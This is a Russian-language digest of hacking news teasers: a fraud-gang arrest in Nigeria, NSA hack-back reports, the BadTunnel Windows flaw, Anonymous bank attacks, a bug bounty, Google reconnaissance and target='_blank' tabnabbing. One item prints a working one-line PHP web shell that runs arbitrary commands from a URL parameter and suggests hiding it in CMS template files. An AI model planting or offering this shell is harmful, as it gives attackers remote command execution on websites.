взлом

Глава международной хакерской группировки арестован в Нигерии

Благодаря совместным усилиям Интерпола и Комиссии по экономическим и финансовым преступлениям Нигерии в городе Порт-Харкорт арестован глава международной ОПГ, руководивший многочисленными операциями в нескольких странах. 40-летнему подозреваемому, известному под ником «Майк», инкриминируют сотни эпизодов Интернет-мошенничества. Общий ущерб от действий ОПГ составил около $60 млн, притом в одном из случаев жертва лишилась $15,4 млн разом.

АНБ пытается взломать российских хакеров

Американские хакеры из АНБ (Агенство Национальной Безопасности), вероятно, пытаются взломать российские хакерские группировки, чтобы выяснить их причастность к взлому серверов Демократической партии США. Об этом сообщает ABC News со ссылкой на источники в американской разведке.

Глава управления операциями по законному доступу АНБ Роберт Джойс ранее не стал комментировать взлом Демократической партии, однако отметил, что у АНБ есть технические возможности и разрешения для того, чтобы «взломать в ответ» причастные хакерские группировки.

Критическая уязвимость позволяет перехватывать весь сетевой трафик юзеров Windows

Исследователи из ИБ-подразделения компании Tencent под названием Xuanwu Lab обнаружили серьезную ошибку в реализации протокола NetBIOS, использующейся в Windows. Критическая уязвимость получила название BadTunnel — она позволяет злоумышленникам полностью контролировать сетевой трафик жертвы.

В чем проблема?

PHP web Shell

Иногда нужно внедрить web shell на сайты с CMS Joomla! и Wordpress. Для управления и изучения структур каталогов web-сервера. Чаще всего они размещаются в файлах шаблонов, чтобы они были незаметны. И их там и стоит искать в первую очередь при различных взломах Ваших сайтов и поражении вирусами...
<?if (isset($_GET['cmd'])) system($_GET['cmd']) ?>

Информация дана исключительно в ознакомительных целях!

Ищем и находим уязвимости с помощью Google

Любой поиск уязвимостей на веб-сайтах начинается с разведки и сбора информации.
Разведка может быть как активной — брутфорс файлов и директорий сайта, запуск сканеров уязвимостей, ручной просмотр сайта, так и пассивной — поиск информации в разных поисковых системах. Иногда бывает так, что уязвимость становится известна еще до открытия первой страницы сайта.

Хакеры из Anonymous заявили о начале кампании против банков по всему миру

Хакерская группа Anonymous заявила, что в течение 30 дней будет атаковать сайты центробанков по всему миру, сообщает Рейтер со ссылкой на видеообращение, опубликованное группой на YouTube.

В среду центробанк Греции заявил, что накануне Anonymous устроила кибератаку на его сайт. Атака длилась несколько минут, затем IT-специалисты банка смогли остановить ее. DDoS-атака затронула только веб-сайт банка, приводит агентство слова анонимного представителя банка.

Школьник взломал Instagram и заработал $10000

Школьник из Финляндии стал самым молодым обладателем награды Bug Bounty за всю историю Facebook, и даже за всю историю IT. Десятилетний парень по имени Яни (родители фамилию не говорят) нашёл способ удаления произвольных комментариев к сообщениям в соц. сети Instagram, сообщает финская газета Iltalehti.

Опасный target="_blank". Осторожно, новая уязвимость!

Большинство разработчиков сайтов, создают внешние ссылки через target="_blank" и не знают одного интересного нюанса — страница, на которую мы попадем таким образом, получит частичный контроль над ссылающейся на нее страницей через js свойство window.opener.
Через window.opener.location мы сможем сделать редирект на, к примеру, фишинговую страницу. Это своего рода tabnabbing, только более продвинутый. Так как жертва меньше всего ожидает подмены страницы, в открытой ранее, доверенной вкладке браузера.

RSS-материал